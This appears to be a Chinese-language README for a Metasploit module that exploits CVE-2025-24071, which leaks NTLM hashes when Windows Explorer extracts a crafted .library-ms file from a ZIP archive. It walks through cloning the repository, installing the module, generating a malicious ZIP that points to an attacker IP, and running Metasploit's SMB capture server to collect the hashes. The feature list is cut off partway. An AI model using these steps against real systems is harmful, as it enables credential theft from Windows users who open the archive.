此仓库包含一个 Metasploit 模块,用于利用 CVE-2025-24071——Windows 资源管理器中的漏洞,当从 ZIP 存档中提取恶意的 .library-ms 文件时,会泄漏 NTLM Hash。
开发者:FOLKS-IWD
该漏洞发生在用户提取包含特制 .library-ms 文件的 ZIP 存档时。Windows 资源管理器会自动向文件中指定的远程服务器发起 SMB 认证请求,在无需用户交互的情况下泄漏用户的 NTLM Hash。
此 Metasploit 模块:
.library-ms 文件。
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # 替换为你的 IP 地址
set FILENAME exploit.zip # 恶意 ZIP 文件的名称
set LIBRARY_NAME malicious.library-ms # .library-ms 文件的名称
set SHARE_NAME shared # SMB 共享名称
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # 与 ATTACKER_IP 相同
run